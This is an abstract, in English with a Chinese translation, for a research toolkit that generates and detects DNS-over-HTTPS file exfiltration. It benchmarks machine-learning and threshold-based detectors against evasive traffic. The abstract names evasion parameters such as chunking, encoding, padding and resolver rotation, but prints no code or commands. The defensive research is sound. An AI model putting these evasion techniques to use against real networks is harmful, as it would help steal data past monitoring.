The purpose of this project is to assess how well defenders can detect DNS-over-HTTPS (DoH) file exfiltration, and which evasion strategies can be used by attackers. While providing a reproducible toolkit to generate, intercept and analyze DoH exfiltration, and comparing Machine Learning vs threshold-based detection under adversarial scenarios. The originality of this project is the introduction of an end-to-end, containerized pipeline that generates configurable file exfiltration over DoH using several parameters (e.g., chunking, encoding, padding, resolver rotation). It allows for file reconstruction at the resolver side, while extracting flow-level features using a fork of DoHLyzer. The pipeline contains a prediction side, which allows the training of machine learning models based on public labelled datasets and then evaluates them side-by-side with threshold-based detection methods against malicious and evasive DNS-Over-HTTPS traffic. We train Random Forest, Gradient Boosting and Logistic Regression classifiers on a public DoH dataset and benchmark them against evasive DoH exfiltration scenarios. The toolkit orchestrates traffic generation, file capture, feature extraction, model training and analysis. The toolkit is then encapsulated into several Docker containers for easy setup and full reproducibility regardless of the platform it is run on. Future research regarding this project is directed at validating the results on mixed enterprise traffic, extending the protocol coverage to HTTP/3/QUIC request, adding a benign traffic generation, and working on real-time traffic evaluation. A key objective is to quantify when stealth constraints make DoH exfiltration uneconomical and unworthy for the attacker.
翻译:本项目的目的是评估防御者检测DNS-over-HTTPS(DoH)文件外泄的能力,以及攻击者可采用的规避策略。在提供可复现的工具包以生成、拦截和分析DoH外泄流量的同时,对比对抗场景下基于机器学习与基于阈值的检测方法。本项目的创新之处在于引入了一个端到端、容器化的流程,该流程可通过多种参数(如分块、编码、填充、解析器轮换)生成可配置的DoH文件外泄流量。该流程支持在解析器端重建文件,同时利用DoHLyzer的分支版本提取流级特征。流程包含预测模块,允许基于公开标注数据集训练机器学习模型,并随后将其与基于阈值的检测方法在恶意和规避性DNS-over-HTTPS流量上进行并行评估。我们在公开DoH数据集上训练随机森林、梯度提升和逻辑回归分类器,并在规避性DoH外泄场景中对它们进行基准测试。该工具包协调流量生成、文件捕获、特征提取、模型训练与分析等环节,随后封装至多个Docker容器中,以实现跨平台的简易部署和完全可复现性。本项目的后续研究方向包括:在混合企业流量上验证结果、将协议覆盖范围扩展至HTTP/3/QUIC请求、增加良性流量生成模块,以及开展实时流量评估。一个关键目标是量化隐蔽性约束何时会使DoH外泄对攻击者而言变得不经济且无价值。